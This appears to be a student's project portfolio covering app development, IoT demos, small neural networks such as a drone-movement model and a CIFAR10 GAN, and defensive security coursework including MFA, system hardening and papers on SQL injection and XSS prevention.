In this project, I and my team worked on a way to summarize websites for the user. We started with one idea and after researching and developing that idea for a while we decided it was too complex for us to achieve in the timeframe given to us, so we opted for a less complex option.
For my SIP I experimented with many different engines before I decided on Flutter for my User Interface. I needed some engine that I could quickly learn, and with which I could quickly develop an MVP.
https://github.com/Koratun/metacognition_artificial_intelligence
My first thoughts went to game development. Engines such as Unity and Unreal were built specifically with many tutorials online so that a budding game developer could learn new skills! An additional plus was that I had worked in Unity before in High school so I tried using that first.
One of the primary features I needed for this app was to communicate with a python script. I searched and searched, but I could not find a way for C# to do that easily. Plus I was more familiar with C++ than I was with C#, so I decided to try a different engine.
Unreal engine seemed a better candidate as it was in C++ and it had a neat blueprinting system for its components that I knew would be useful.
I got further into prototyping a simple UI, but I quickly found out that there was too much information about too many things that I simply did not need for my project. I needed a simple 2D interface, not all the bells and whistles that come with a full 3D game.
Enter Flutter. Flutter seemed to be exactly what I needed! It is a relatively new engine specifically designed to make it easier for developers to push out an MVP for software. While it is aimed primarily at mobile it also has large support for both web and desktop platforms. This also made it easier for a feature that I eventually wanted my SIP to have: Availability for multiple platforms.
For this project, I used Python and the PyCharm IDE.
For this project, I used C++ and the Visual Studio IDE.
I helped create an API that is hosted on a Linux docker image running Python 3.9.7.
For security reasons, I cannot give the GitHub link to this repository. This has been approved by UAT (per Jill Coddington).
I created an admin dashboard for my workplace so that we can easily view and make changes to values in our database from anywhere in the world without needing direct access to our database. For example, if someone created a post with bad content (possibly a link to malware or pornographic content) we can instantly mark it as disapproved and the app on the front end will hide its contents from our users.
For security reasons, I cannot give the GitHub link to this repository. This has been approved by UAT (per Jill Coddington).
Here I demonstrate the M5StickCPlus recording its acceleration data and sending the largest value it has recorded to the ThingSpeak API to be recorded on my graph.
Here I demonstrate how to activate an applet trigger on IFTTT with the press of a button on the M5StickCPlus. This then sent an email to my student email account as shown below.
I plan out sprints with my SIP using Trello. While planning the next sprint I create cards (or tickets) and place them into sprint planning. When a new sprint begins, I place the tasks that I want to complete for that sprint into the To Do column. Completed cards are archived so that they can be referenced in the future should the need arise. Each card comes packed with all the information necessary for the feature it describes.
https://trello.com/b/v5lPOZBl/mai-milestone-4-%F0%9F%94%A5-07-08-2022-07-28-2022
While I do not manage the entire Sprint board for my workplace, I do sometimes have to create my own tickets and I always have to manage my own tickets and write necessary information within them. For example, when I complete work on a ticket I have to write in the changes I made and I have to provide a checklist for the QA team so they know how to test what I have done.
For security reasons, I cannot give the link to this Jira board. This has been approved by UAT (per Jill Coddington).
In this program, I demonstrate the differences in efficiency between some common sorting algorithms: Bubble, Insertion, and Merge sort. This is done with an array filled with 10,000 random integers.
The magic behind the sudoku solver in this program is controlled by a sparsely populated matrix of linked nodes, a linked list matrix if you will.
This project was two-fold. I wanted to take a series of images captured from drone movement and then feed those images into an AI that would predict how far the drone had moved between two images taken right after each other. So first I created a simulated drone in Unity and had it fly around randomly and take pictures as it moved. Then I fed those images into my AI which used deep learning to learn the distances that the drone had moved. It uses a couple of convolutional layers in a submodel that it uses to analyze both images, then it combines the data of the two images and tries to learn what differences in the two images constitute what movement in what direction.
This AI could then be loaded into a server that could communicate with a drone and tell it its relative position to where it booted up as it fed the server what it could see.
https://github.com/Koratun/Deep-Sight - AI Code
https://github.com/Koratun/Drone-Simulator - Simulator Code
After just a few epochs you can see on the left how quickly the loss descends to around 0.98. On the right, you can see an example of the data that was fed into the AI.
In this project, I used an M5Stick to gather microphone data. It would then compress that data into hex and send it to the server.
This was the python code that ran in the server that passed the microphone data to a Shazam library in order to process and find a musical match.
This was the C code that ran on the M5 to capture, compress, and send audio data to the server.
This program uses some natural language processing libraries to search the internet for answers to questions that you ask it. It also speaks to the user and reads out its 5-sentence response to your question. And it cites its sources!
https://github.com/Koratun/nlp_demos/tree/master/researcher
For example, I asked, "What is the leading cause of global warming?" And it responded with the following:
I coded a simple AI that uses gradients and matrices to learn how to identify handwritten numbers. It uses a single dense layer of 200 hidden nodes to analyze a 28x28 greyscale image with a learning rate of 0.08 over 40 epochs. This allowed it to quickly descend the loss curve until it begins to stabilize around a loss of 0.5 and an accuracy of 89%.
This project was a little bit ambitious for my computer. I decided to make a Generative Adversarial Network using the CIFAR10 dataset as the input data. A GAN is designed with two inner AIs that compete against each other. The Discriminator's job is to determine if the image it is seeing is real or generated, and the Generator's job is to produce images that fool the Discriminator. Over time the two will improve each other as the discriminator learns what things make an image real and the generator learns what things to create to imitate a real image.
After the long process of learning how to do all of this I finally had a working model! So I started training it with my NVIDIA 2060 Super, a GPU that allows the AI to learn far faster than by just using the CPU. However, even with this moderately advanced GPU, the model proved to be too complex to train with any good speed. I ran the training for 2 straight days and it barely began learning how to make differently shaped color blobs as depicted below.
https://github.com/Koratun/metacognition_artificial_intelligence/tree/master/playground_ai - Specifically the generative_adversarial_network.py and gan_display.py files
As said above, this model takes two images taken right after each other and compares them to determine the distance traveled between the two images.
This model handles analyzing each individual image.
This model handles analyzing the differences between two images in the sequence.
For generator portion of my CIFAR10 Generative Adversarial Network, I used some randomly generated noise data with a series of dense layers followed by 2D Convolutional Transpose layers (essentially the inverse operation of a normal Convolutional layer) to produce an image.
For the Discriminator, I used essentially the opposite: Some convolutional layers followed by some dense layers to produce a binary response of real or fake.
https://github.com/Koratun/metacognition_artificial_intelligence/tree/master/playground_ai - Specifically the generative_adversarial_network.py and gan_display.py files
In this project, I used Python to make a simple To-Do list and targeted the Windows platform, which I developed in VSCode.
Here I show how I developed my IFTTT Demo in C in the Arduino IDE targeting the M5StickCPlus.
This is the Drone Simulator I used to create the data to feed my Drone Sight AI. I used the Unity game engine which uses C# as well as Visual Studio. I also used Sourcetree as my VCS for this project.
Firebase is a database management system, and to demonstrate how one can use it, I created a simple program that can be controlled via Firebase. When the specific row is set to ON, then the main light switches on, and when it is set to OFF the light switches off. Simply by changing the value in the database I am able to affect changes on a device that could be anywhere in the world (with an Internet connection).
At my workplace, we use PostgreSQL as our database management system. It's basically SQL with a few extra pieces of functionality here and there. At Involio we have many different objects with complex relationships to each other: Posts, Users, Files, Comments, Likes, etc. And a relational database makes this much easier to work with. I have also written many queries with SQLAlchemy (a python library) and raw SQL.
For security reasons, I cannot give the GitHub link nor the AWS link to this database instance. This has been approved by UAT (per Jill Coddington).
Here I create a network diagram for Real Fake Industries. They have two sites that are connected via a VPN using an IPsec Tunnel. Each workgroup (sales, management, the call center, etc.) is separated onto its own VLAN so that atypical traffic for each group can be more easily identified. The IT group in Phoenix contains backup DNS and ADDC. It also contains its own IDS to monitor the traffic within the Phoenix network. The IDS in San Diego monitors all traffic within the corporation.
My workplace has an admin dashboard that can access, update, and delete any data in our database from anywhere with an Internet connection. Previously, the dashboard was only protected by a password. But I changed that. I leveraged a MFA service called Twilio and implemented a required MFA for any admin to access the admin dashboard, thus further securing it from any prying eyes.
In this paper, I detail how to harden a Windows 10 system with screenshots.
Below and to the right is some of the python code I wrote to authenticate a user based on their username, password, and OTP given to them by Twilio.
This presentation briefly goes over several different aspects of the Business Continuity and Disaster Recovery Plan that a team of myself and 3 other students created.
This paper goes in-depth on how to train employees on being more aware of email phishing attacks, having better personal security, and having better physical security.
This report details the Omnibus rule put into effect by Congress in 2013. It modifies both HIPAA and HITECH which deal with electronic storage of patient's health information and other PII.
This implementation plan details how Real Fake Industries will safeguard its new data center with physical and digital security along with brief IR and futureproofing plans. These safeguards will allow RFI to follow best practices when collecting, storing, and transmitting user data.
In this paper, I dive into common forms of SQL injection, how they are executed, and how they can be prevented.
In this paper, I discuss what cross-site scripting is, and how it can be used to phish people's PII. I also discuss what is needed for websites to prevent this kind of abuse.